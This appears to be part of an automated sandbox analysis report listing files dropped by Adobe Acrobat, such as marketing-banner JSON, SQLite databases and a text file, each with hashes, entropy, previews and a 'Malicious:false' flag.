                                                                              SHA-512:1707A6E815667E8415A612417E87C2A4828659021A4BD05C5BFD3F6405FC2C1654529B0209A4210020D1D49E6ACDE1D1C663B0233BB0C5DB85D15392B2E3328F
                                                                              Malicious:false
                                                                              Preview:{"analyticsData":{"responseGUID":"052d130c-52fd-4466-a6cc-6c5cf7d590b7","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1728095250978,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                              File Type:JSON data
                                                                              Category:dropped
                                                                              Size (bytes):285
                                                                              Entropy (8bit):5.344522840142089
                                                                              Encrypted:false
                                                                              SSDEEP:6:YEQXJ2HXHQXHCDMTuVblKHVoZcg1vRcR0YGVBYeoAvJfPmwrPeUkwRe9:YvXKXAu1Zc0vTYVGH56Ukee9
                                                                              MD5:4344416594E5CFFD59C74DAB3B5DCD13
                                                                              SHA1:E8A61881967F0BB713E59F5CA53E3865214DD85A
                                                                              SHA-256:EFCD05F01DDF28201BEA021131A8C61DE7B49DD830EBB27D1B300E8ABE760D71
                                                                              SHA-512:B63C9790F8436AD815D1F727D45B2AD23CBC72E6215F1B76FC8D63B3D290C820D7CFE49E560CFD4810E97888CA487F0BB71D67E40CD57E5302AED7B1B7FACEAC
                                                                              Malicious:false
                                                                              Preview:{"analyticsData":{"responseGUID":"052d130c-52fd-4466-a6cc-6c5cf7d590b7","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1728095250978,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                              File Type:JSON data
                                                                              Category:dropped
                                                                              Size (bytes):1091
                                                                              Entropy (8bit):5.690075416288902
                                                                              Encrypted:false
                                                                              SSDEEP:24:Yv6Xh1zvTY6pLgE7cgD6SOGtnnl0RCmK8czOCYvSz9:YvAL1hgs6SraAh8cvYKz9
                                                                              MD5:F7E1978CDA0FB2685C856EB09BF4DB15
                                                                              SHA1:122D2617AF0CC411CC8F0E01E5F26C5C9033E5F8
                                                                              SHA-256:56C3CF8C96504E034EE479082BCD877C5C0AB516CD9DB571AFF49E29AD4272D6
                                                                              SHA-512:4C6474A9BFE5679136FEF273BBD5B75F31B23410738B645EDC3C1EDB45309405ECEF526AD13E64660A5E951AAEEACE2E2529057973D7D35068AC1033A23E5CDE
                                                                              Malicious:false
                                                                              Preview:{"analyticsData":{"responseGUID":"052d130c-52fd-4466-a6cc-6c5cf7d590b7","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1728095250978,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Convert_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"89628_281075ActionBlock_2","campaignId":89628,"containerId":"1","controlGroupId":"","treatmentId":"67a3a874-888f-4d96-9f3d-26e70c3e0be1","variationId":"281075"},"containerId":1,"containerLabel":"JSON for DC_Reader_Convert_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkNvbnZlcnQgUERGIGZpbGVzIHRvIE1pY3Jvc29mdCBXb3JkIGFuZCBFeGNlbC4ifSwidGNhdElkIjoiUkdTMDM1MS1FTlUtQ2hhbGxlbmdlcjIifQ==","dataType":"ap
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                              File Type:JSON data
                                                                              Category:dropped
                                                                              Size (bytes):1050
                                                                              Entropy (8bit):5.651142777311717
                                                                              Encrypted:false
                                                                              SSDEEP:24:Yv6Xh1zvTYcVLgEF0c7sbnl0RCmK8czOCYHflEpwiVw9:YvALZFg6sGAh8cvYHWpwz9
                                                                              MD5:C8FE1C3A766CFC31D439FA6EE96B7334
                                                                              SHA1:76B0E062EEF3E269CAF1FF14FF7C494EBCFD7BE1
                                                                              SHA-256:4B5F6B65F11D48D9BD434299CBB16A78291FC19B2CE792DD3B4BB10D9FFC36B0
                                                                              SHA-512:5A96773D83BEB71B6C3117478D367F5835D353F5E9CE87BB879ABEA540E87B09C944C8BE016B01E4048F5963F09B7B7DA932D271F8DCC7E1E0E4B9013B534FDD
                                                                              Malicious:false
                                                                              Preview:{"analyticsData":{"responseGUID":"052d130c-52fd-4466-a6cc-6c5cf7d590b7","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1728095250978,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Disc_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"85534_264855ActionBlock_0","campaignId":85534,"containerId":"1","controlGroupId":"","treatmentId":"0924134e-3c59-4f53-b731-add558c56fec","variationId":"264855"},"containerId":1,"containerLabel":"JSON for DC_Reader_Disc_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkNvbnZlcnQsIGVkaXQgYW5kIGUtc2lnblxuZm9ybXMgJiBhZ3JlZW1lbnRzLiJ9LCJ0Y2F0SWQiOm51bGx9","dataType":"application\/json","encodingScheme":true},"
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                              File Type:JSON data
                                                                              Category:dropped
                                                                              Size (bytes):292
                                                                              Entropy (8bit):5.295098233108986
                                                                              Encrypted:false
                                                                              SSDEEP:6:YEQXJ2HXHQXHCDMTuVblKHVoZcg1vRcR0YGVBYeoAvJfQ1rPeUkwRe9:YvXKXAu1Zc0vTYVGY16Ukee9
                                                                              MD5:68C531B9F240D346F3A6C1159F6448A7
                                                                              SHA1:C87190E58B11175DCEFEB10E3034DF489E4E8C56
                                                                              SHA-256:AA95A91C91390C17BFF42292E6797B3EC4388B4CAEDADF317F2359F8EB1100DD
                                                                              SHA-512:F953C574DF16D9F6840F26B921F560F58E58FA8618021340DAD6E570823CC741833C0C53AB4DE98804E27965FCEA78C1C04991BC99575274C5344FF0CFDA05B0
                                                                              Malicious:false
                                                                              Preview:{"analyticsData":{"responseGUID":"052d130c-52fd-4466-a6cc-6c5cf7d590b7","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1728095250978,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                              File Type:JSON data
                                                                              Category:dropped
                                                                              Size (bytes):1098
                                                                              Entropy (8bit):5.685892893354743
                                                                              Encrypted:false
                                                                              SSDEEP:24:Yv6Xh1zvTYB2LgEFcs2SOGt0nl0RCmK8czOCUaBtCrfSz9:YvALIogq2SrhAh8cvUgEmz9
                                                                              MD5:06762363FCE91BCF7CF1CECD6363F09C
                                                                              SHA1:2BF927ADB7686E22688BB18E7D2FCA581C9D7C76
                                                                              SHA-256:90A73A199A8D1A140BFE853D420FA617F750693ACB9D9DC0AED970BEFC74D46E
                                                                              SHA-512:D53993EBC9B98753EAB2C1A915ED1D93F0A894BDA920F9938625E55993E1FFBA627CFA8387B268426F06CFAB4DDACD2E9636A216A4A2F4DEE4FA5990280DD53E
                                                                              Malicious:false
                                                                              Preview:{"analyticsData":{"responseGUID":"052d130c-52fd-4466-a6cc-6c5cf7d590b7","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1728095250978,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Edit_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"89628_281075ActionBlock_0","campaignId":89628,"containerId":"1","controlGroupId":"","treatmentId":"abdf1d9d-2114-4953-95a6-4eed783b9872","variationId":"281075"},"containerId":1,"containerLabel":"JSON for DC_Reader_Edit_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IlR1cm4gc2Nhbm5lZCBwYXBlciBkb2N1bWVudHNcbmludG8gaW5zdGFudGx5IGVkaXRhYmxlIFBERnMuIn0sInRjYXRJZCI6IlJHUzAzNTEtRU5VLUNoYWxsZW5nZXIyIn0=","dataTy
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                              File Type:JSON data
                                                                              Category:dropped
                                                                              Size (bytes):1164
                                                                              Entropy (8bit):5.697736209207945
                                                                              Encrypted:false
                                                                              SSDEEP:24:Yv6Xh1zvTYBKLgEfIcZVSkpsn264rS514ZjBrwloJTmcVIsrSK5wu:YvALAEgqprtrS5OZjSlwTmAfSKeu
                                                                              MD5:28C6FA5C21F38143C5C5C02A1C96B0A7
                                                                              SHA1:22A99FED3CCBB5F10A42A3367A506AB068BFE281
                                                                              SHA-256:C1445A1449E6060C8B68A205A7C3DE737669A14D88F22BCD1E00F693E7FCF4A4
                                                                              SHA-512:7EC54E8E2586B43063BD9619EFC64F4BBD4BBA0DEA9DE1DF08098C2AEEE8C70BF708B0F9DC4C0251B783BC02CD80A152F592C9125CE38A14038024423648F50B
                                                                              Malicious:false
                                                                              Preview:{"analyticsData":{"responseGUID":"052d130c-52fd-4466-a6cc-6c5cf7d590b7","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1728095250978,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Home_LHP_Trial_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"85531_264848ActionBlock_0","campaignId":85531,"containerId":"1","controlGroupId":"","treatmentId":"ee1a7497-76e7-43c2-bb63-9a0551e11d73","variationId":"264848"},"containerId":1,"containerLabel":"JSON for DC_Reader_Home_LHP_Trial_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IlRyeSBBY3JvYmF0IFBybyJ9LCJ1aSI6eyJ0aXRsZV9zdHlsaW5nIjp7ImZvbnRfc2l6ZSI6IjE1cHgiLCJmb250X3N0eWxlIjoiMCJ9LCJkZXNjcmlwdGlvbl9zdHlsaW5nIjp7ImZvbnRfc2l6ZSI6IjEzcHgiLCJmb250X3N0eWxlIjoiLTEifSwidGl0bGUiOiJGcmVlIHRyaWFsIiwiZGVzY3JpcHRpb24iOiJHZXQgdW5saW1pdGVkIGFjY2VzcyB0b1xucHJlbWl1bSBQREYgYW5kIGUtc2lnbmluZ1xudG9vbHMuIn0sImJhbm5lcl9zdHlsaW5nIjo
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                              File Type:JSON data
                                                                              Category:dropped
                                                                              Size (bytes):289
                                                                              Entropy (8bit):5.298964422803756
                                                                              Encrypted:false
                                                                              SSDEEP:6:YEQXJ2HXHQXHCDMTuVblKHVoZcg1vRcR0YGVBYeoAvJfYdPeUkwRe9:YvXKXAu1Zc0vTYVGg8Ukee9
                                                                              MD5:9651724D624BFCFC8A2807F582AFED47
                                                                              SHA1:DE0D21649D912E63B71108315B3642AF2523B060
                                                                              SHA-256:02EA00734182CFD40DEA4BEE0387C33DF6DA2610066A0556403DEA5AA00709BA
                                                                              SHA-512:087FB3DF6F599B949036EFEDAA0A56DC076CF1ED885599F0BCAAC34922653CC3402FEA6EC250C448F8DD2F4762113D9AC4FE048E09672CAA4F6CCA764DCD1711
                                                                              Malicious:false
                                                                              Preview:{"analyticsData":{"responseGUID":"052d130c-52fd-4466-a6cc-6c5cf7d590b7","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1728095250978,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                              File Type:JSON data
                                                                              Category:dropped
                                                                              Size (bytes):1395
                                                                              Entropy (8bit):5.773928221884159
                                                                              Encrypted:false
                                                                              SSDEEP:24:Yv6Xh1zvTYMrLgEGOc93W2JeFmaR7CQzttgBcu141CjrWpHfRzVCV9FJNY9:YvALPHgDv3W2aYQfgB5OUupHrQ9FJe9
                                                                              MD5:C34AE37CF3DFB98482B3E2803866AD68
                                                                              SHA1:38788E1801A8EED76ECD4745F6B8FD99ED0D04C2
                                                                              SHA-256:620BA1406DACE8918DC0204716CC9299B9278B757D66BDD11D235F7F4FC2208A
                                                                              SHA-512:D1FB1B06BBBC5B432385F37EDDAC607ABB91CBCFA98D723CF5F294FB1F377E51A8D0FCBCD176C43006A8435084BFBC1CD1E29642A1848EAC6858B069000A6200
                                                                              Malicious:false
                                                                              Preview:{"analyticsData":{"responseGUID":"052d130c-52fd-4466-a6cc-6c5cf7d590b7","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1728095250978,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_RHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"57802_176003ActionBlock_0","campaignId":57802,"containerId":"1","controlGroupId":"","treatmentId":"d0374f2d-08b2-49b9-9500-3392758c9e2e","variationId":"176003"},"containerId":1,"containerLabel":"JSON for Reader DC RHP Banner","content":{"data":"eyJjdGEiOnsidHlwZSI6ImJ1dHRvbiIsInRleHQiOiJGcmVlIDctRGF5IFRyaWFsIiwiZ29fdXJsIjoiaHR0cHM6Ly9hY3JvYmF0LmFkb2JlLmNvbS9wcm94eS9wcmljaW5nL3VzL2VuL3NpZ24tZnJlZS10cmlhbC5odG1sP3RyYWNraW5naWQ9UEMxUFFMUVQmbXY9aW4tcHJvZHVjdCZtdjI9cmVhZGVyIn0sInVpIjp7InRpdGxlX3N0eWxpbmciOnsiZm9udF9zaXplIjoiMTQiLCJmb250X3N0eWxlIjoiMyJ9LCJkZXNjcmlwdGlvbl9zdHlsaW5nIjp7ImZvbnRfc2l6ZSI6IjEyIiwiZm9udF9zdHlsZSI6IjMifSwidGl0
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                              File Type:JSON data
                                                                              Category:dropped
                                                                              Size (bytes):291
                                                                              Entropy (8bit):5.282518637846666
                                                                              Encrypted:false
                                                                              SSDEEP:6:YEQXJ2HXHQXHCDMTuVblKHVoZcg1vRcR0YGVBYeoAvJfbPtdPeUkwRe9:YvXKXAu1Zc0vTYVGDV8Ukee9
                                                                              MD5:A3C52A56085069C1FC70CD4932A703F5
                                                                              SHA1:B0E8F861B5A92809B9ED4C7E33458FA2E1E38C02
                                                                              SHA-256:1872D164B100C434DFD8C68D062A5DEAE43A5806CAF5EB7F28B58894B1E935D6
                                                                              SHA-512:5BEB55F7782A79448557FFA4FB66FFA8510C01A2BA3987BA794088E64DDC6F6A8FDF25801C26FA6E0F8D36D0BF7B9CAAD4DEA6E37C51F6A2271A9E1B25A62544
                                                                              Malicious:false
                                                                              Preview:{"analyticsData":{"responseGUID":"052d130c-52fd-4466-a6cc-6c5cf7d590b7","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1728095250978,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                              File Type:JSON data
                                                                              Category:dropped
                                                                              Size (bytes):287
                                                                              Entropy (8bit):5.286841375936924
                                                                              Encrypted:false
                                                                              SSDEEP:6:YEQXJ2HXHQXHCDMTuVblKHVoZcg1vRcR0YGVBYeoAvJf21rPeUkwRe9:YvXKXAu1Zc0vTYVG+16Ukee9
                                                                              MD5:C72505270D8B8AC6134A53266A5B1B13
                                                                              SHA1:76CAF55764AEFBBED209C9DBFAFA86F856A5BF89
                                                                              SHA-256:AABE3DC98ECC5140300C159833C37706524A77CBE414FC25E316936F78475EE6
                                                                              SHA-512:8A846D3374AE0C17C46A73352923F502CE928C02219C035684F6D4A018581DFC752165428A296E8916607C8E160BB19D8FB7B3B90670A9102FDDDD56D686BA7F
                                                                              Malicious:false
                                                                              Preview:{"analyticsData":{"responseGUID":"052d130c-52fd-4466-a6cc-6c5cf7d590b7","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1728095250978,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                              File Type:JSON data
                                                                              Category:dropped
                                                                              Size (bytes):1054
                                                                              Entropy (8bit):5.663820888489591
                                                                              Encrypted:false
                                                                              SSDEEP:24:Yv6Xh1zvTYmamXayLgE6cTg4QSOGtNaqnl0RCmK8czOC/CrfSz9:YvALBBgSXQSrOAh8cv6mz9
                                                                              MD5:F69CD47B8C492260AC931206BE2C662E
                                                                              SHA1:78880157D21633345C692745A800308ACD6D8128
                                                                              SHA-256:3769D61C07B9533953E94F88DB5929F02E12CD4B496A06DBDB9F9B566E51BC6B
                                                                              SHA-512:E82E95D61BC0D139255A577CE387AD8FE5A238FD7CA6E69AE5660F9E7FDA933865768225DC07D26FE395C3746F0ECC5499CF4B9CB031178EDECCBF4284BBDBF4
                                                                              Malicious:false
                                                                              Preview:{"analyticsData":{"responseGUID":"052d130c-52fd-4466-a6cc-6c5cf7d590b7","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1728095250978,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Sign_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"89628_281075ActionBlock_1","campaignId":89628,"containerId":"1","controlGroupId":"","treatmentId":"7fe39695-394c-4706-9b50-651e7499d428","variationId":"281075"},"containerId":1,"containerLabel":"JSON for DC_Reader_Sign_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkVhc2lseSBmaWxsIGFuZCBzaWduIFBERnMuIn0sInRjYXRJZCI6IlJHUzAzNTEtRU5VLUNoYWxsZW5nZXIyIn0=","dataType":"application\/json","encodingScheme":tru
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                              File Type:JSON data
                                                                              Category:dropped
                                                                              Size (bytes):286
                                                                              Entropy (8bit):5.261336408917416
                                                                              Encrypted:false
                                                                              SSDEEP:6:YEQXJ2HXHQXHCDMTuVblKHVoZcg1vRcR0YGVBYeoAvJfshHHrPeUkwRe9:YvXKXAu1Zc0vTYVGUUUkee9
                                                                              MD5:ED9DA1862DF35EF90150B6580D987FA7
                                                                              SHA1:92D39E2843E8B4BE0A888B8983FF4447764BD7D2
                                                                              SHA-256:43A477549FDFCFCF1FF9CC10CBA86BA99CB578B807CB8E3FEBBDFD20AD67FEEA
                                                                              SHA-512:415A5884BE19F2D3B2B38A6378E984703E47045888B920B6691122388C96D7F78A39135E591CD9BFBFEF0CA50DE436EB700ABB1D89C4CB4B6C6A85AC896D7797
                                                                              Malicious:false
                                                                              Preview:{"analyticsData":{"responseGUID":"052d130c-52fd-4466-a6cc-6c5cf7d590b7","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1728095250978,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                              File Type:JSON data
                                                                              Category:dropped
                                                                              Size (bytes):782
                                                                              Entropy (8bit):5.361015518338007
                                                                              Encrypted:false
                                                                              SSDEEP:12:YvXKXAu1Zc0vTYVGTq16Ukee1+3CEJ1KXd15kcyKMQo7P70c0WM6ZB/uhWsXN:Yv6Xh1zvTYx168CgEXX5kcIfANhz9
                                                                              MD5:F878E108070F56BA419F22851726C031
                                                                              SHA1:54F84508535355AC180C79FE07FF41399050B7FD
                                                                              SHA-256:F560BB6B9A1E90CEB3C3EB83352EDBE12DA36A2870E992F6DC58654EB58E6404
                                                                              SHA-512:45294C5C6BDF1D2E42D79456FD422C7D3670693655A916A948D235623F4B204918A0778DFC287C835C4349A42EFAA39D1DF03AA40D92AF3C71985560DA8CD930
                                                                              Malicious:false
                                                                              Preview:{"analyticsData":{"responseGUID":"052d130c-52fd-4466-a6cc-6c5cf7d590b7","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1728095250978,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"Edit_InApp_Aug2020"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"20360_57769ActionBlock_0","campaignId":20360,"containerId":"1","controlGroupId":"","treatmentId":"3c07988a-9c54-409d-9d06-53885c9f21ec","variationId":"57769"},"containerId":1,"containerLabel":"JSON for switching in-app test","content":{"data":"eyJ1cHNlbGxleHBlcmltZW50Ijp7InRlc3RpZCI6IjEiLCJjb2hvcnQiOiJicm93c2VyIn19","dataType":"application\/json","encodingScheme":true},"endDTS":1735804679000,"startDTS":1727918011015}}}}
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):4
                                                                              Entropy (8bit):0.8112781244591328
                                                                              Encrypted:false
                                                                              SSDEEP:3:e:e
                                                                              MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                                                                              SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                                                                              SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                                                                              SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                                                                              Malicious:false
                                                                              Preview:....
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                              File Type:JSON data
                                                                              Category:dropped
                                                                              Size (bytes):2818
                                                                              Entropy (8bit):5.115046665124306
                                                                              Encrypted:false
                                                                              SSDEEP:48:Yy8P8P83mG8C8Pncg8KjN8bNla82D86t8BDc8AQ8wqG8nKko82W9g8J8Bb:e003m5VvWKubNldD6SBD/YxnFb9jeZ
                                                                              MD5:F3582595DA7899AD0FE07256088113FF
                                                                              SHA1:8E4588FE2652180179A36245AC6A9A4D9A976A4B
                                                                              SHA-256:D919DAD57C3F6F1D245C6E1BCB6F4CC4B63674ECB9A40F7B69115FB1EC2F2952
                                                                              SHA-512:50CC8A14740777C5B23A81339769643F03BBF3FC29D57E4FE02EB769219D8D7438C7D9BACA7DAB5C0DE3F8AE38D2A897C338FA3E9133B4E58226359464F0C2C9
                                                                              Malicious:false
                                                                              Preview:{"all":[{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"0bcb2e2056e0b498176b967e7b4bb770","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":1050,"ts":1727918010000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"db899d44a779b9aac153ac9c027e93c9","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":1164,"ts":1727918010000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"7c916ccf77fd0b3c4256b251b1dfeda9","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1054,"ts":1727918010000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"d91da3867f9de8b05a03e15e951f626a","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1091,"ts":1727918010000},{"id":"DC_Reader_Edit_LHP_Banner","info":{"dg":"051c5e55760d8706229be6fcfba9de1d","sid":"DC_Reader_Edit_LHP_Banner"},"mimeType":"file","size":1098,"ts":1727918010000},{"id":"Edit_InApp_Aug2020","info":{"dg":"1a67b7d5fcf66f808e207333e731460e","sid":"Edit_InApp_Aug2020"},"mimeType":"file","size":782,"ts":17
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 25, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 25
                                                                              Category:dropped
                                                                              Size (bytes):12288
                                                                              Entropy (8bit):1.1886588074323032
                                                                              Encrypted:false
                                                                              SSDEEP:48:TGufl2GL7msEHUUUUUUUUVmSvR9H9vxFGiDIAEkGVvppA:lNVmswUUUUUUUUs+FGSItS
                                                                              MD5:3F5E872A5DF687EC34EB048936DBA056
                                                                              SHA1:6892C5A4972E39AF7E19A30D5B05E6D9513F91DD
                                                                              SHA-256:2B9DAB6F79EF9E5FF533097986E761A9CC14064F82B79BC2F64B15B83401BE3B
                                                                              SHA-512:6A35A92382E6690A4CCC09D0B2385EBE342AEC149E8FE3BE47FFE3F6081AD8ACB4030AC2C7CC6BB01D17560202CF3CFDCFD940153B32793285008B5114FD0382
                                                                              Malicious:false
                                                                              Preview:SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                              File Type:SQLite Rollback Journal
                                                                              Category:dropped
                                                                              Size (bytes):8720
                                                                              Entropy (8bit):1.606944069328093
                                                                              Encrypted:false
                                                                              SSDEEP:48:7MmKUUUUUUUUUUVkvR9H9vxFGiDIAEkGVv+qFl2GL7msJ:7aUUUUUUUUUUCFGSItUKVmsJ
                                                                              MD5:62A2300809D5D6597A4049D29DB022F3
                                                                              SHA1:CE4A760D54DB1608C5815DE479C4C6063BF411D9
                                                                              SHA-256:6717FA962411364037ED09CF1034CDBD28C174FDB616E0260077D615B6B8818B
                                                                              SHA-512:BDAC0CFFB1868D0DAB9D4148D596D95188D0217060D530D0F81621F3518DF39B6395659FA3D3F0B09B03593B19A13231F1B5C88B6748E04DBBFCC10855C968C6
                                                                              Malicious:false
                                                                              Preview:.... .c.....d.Y.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................f.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):246
                                                                              Entropy (8bit):3.4985264301455885
                                                                              Encrypted:false
                                                                              SSDEEP:6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8gju9KCH:Qw946cPbiOxDlbYnuRKLOKw
                                                                              MD5:5B739B024370CEB9DD4900697E63E75F
                                                                              SHA1:CE89CE558A4F0533079927E69DECBC73CEA02461
                                                                              SHA-256:EF23A9537F4AA86AB1A5BD9B9EAFDAA335A7DF228456F08F8489AF2B2171CFAF
                                                                              SHA-512:A737E58E313E4962CDEA3FE3CC15E97BA2F20E2F523D274A7056335D69079C34544A18DCBC8DDAABF22BD981FFC722BF21910D6CCA27A6ACC8E3161887BE6AD1
                                                                              Malicious:false
